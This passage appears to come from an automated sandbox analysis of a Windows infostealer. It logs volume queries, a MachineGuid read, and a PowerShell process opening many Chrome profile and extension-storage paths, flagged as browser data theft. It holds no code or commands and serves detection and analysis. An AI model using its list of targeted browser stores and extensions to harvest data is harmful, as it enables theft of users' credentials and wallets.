Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\Desktop\SplpM1fFkV.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information

barindex
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_storeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics DatabaseJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\031db23f-f53a-4d6b-b429-cd0302ef56d3Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\CacheJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\odbfpeeihdkbihmopkbjmoonfanlbfclJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storageJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabaseJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\3e445a25-c088-46bb-968a-82532b92e486Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation PlatformJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App SettingsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync DataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\6490c938-fe3f-48ae-bc5e-e1986298f7c1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\NetworkJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\IconsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcbigmjiafegjnnogedioegffbooigliJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_dbJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\FilesJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\IconsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code CacheJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhiJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCacheJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons MonochromeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dirJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\a5f61848-f128-4a80-965b-a3000feed295Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncmJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CacheJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_dbJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\IconsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dirJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldoomlJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabaseJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons MonochromeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heamnjbnflcikcggoiplibfommfbkjpjJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmiedaJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session StorageJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mfgccjchihfkkindfppnaooecgfneiiiJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDBJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCacheJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDBJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons MaskableJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databasesJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnmbobjmhlngoefaiojfljckilhhlhcjJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dirJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons MaskableJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bopcbmipnjdcdfflfgjdgdjejmgpoaabJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibagJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension RulesJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCacheJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension ScriptsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download ServiceJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorageJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM StoreJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasmJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\SessionsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjfJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDBJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web ApplicationsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons MaskableJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\jsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDBJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons MonochromeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\defJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local StorageJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\58ef9818-5ea1-49a0-b5b0-9338401a7943Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons MonochromeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_dbJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session StorageJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons MaskableJump to behavior
